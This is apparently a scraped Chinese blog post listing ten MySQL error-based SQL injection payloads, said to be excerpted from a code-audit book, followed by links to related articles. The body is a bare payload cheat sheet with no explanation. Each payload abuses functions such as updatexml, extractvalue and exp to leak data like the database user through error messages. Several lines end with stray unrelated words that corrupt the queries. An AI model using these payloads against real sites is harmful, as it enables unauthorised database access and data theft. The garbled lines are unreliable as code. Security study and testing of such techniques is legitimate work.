十種MySQL報錯注入
如下均摘自《代碼審計:企業級Web代碼安全架構》一書安全
1.floor()架構
select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);3d
2.extractvalue()orm
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));xml
3.updatexml()blog
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));ip
4.geometrycollection()string
select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));io
5.multipoint()table
select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
6.polygon()
select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
7.multipolygon()
select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
8.linestring()
select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
9.multilinestring()
select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
10.exp()
select * from test where id=1 and exp(~(select * from(select user())a));
- 1. mysql 3種報錯模式注入
- 2. mysql 二十餘種報錯注入姿式
- 3. MySQL報錯注入總結
- 4. mysql報錯注入利用
- 5. 報錯注入
- 6. 【SQL注入】報錯注入
- 7. SQL注入---報錯注入
- 8. mysql基於「報錯」的注入
- 9. mysql報錯注入手工方法
- 10. 深刻理解mysql報錯注入
- 更多相關文章...
- • SQLite 注入 - SQLite教程
- • Spring DI(依賴注入)的實現方式:屬性注入和構造注入 - Spring教程
- • 漫談MySQL的鎖機制
- • YAML 入門教程
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. mysql 3種報錯模式注入
- 2. mysql 二十餘種報錯注入姿式
- 3. MySQL報錯注入總結
- 4. mysql報錯注入利用
- 5. 報錯注入
- 6. 【SQL注入】報錯注入
- 7. SQL注入---報錯注入
- 8. mysql基於「報錯」的注入
- 9. mysql報錯注入手工方法
- 10. 深刻理解mysql報錯注入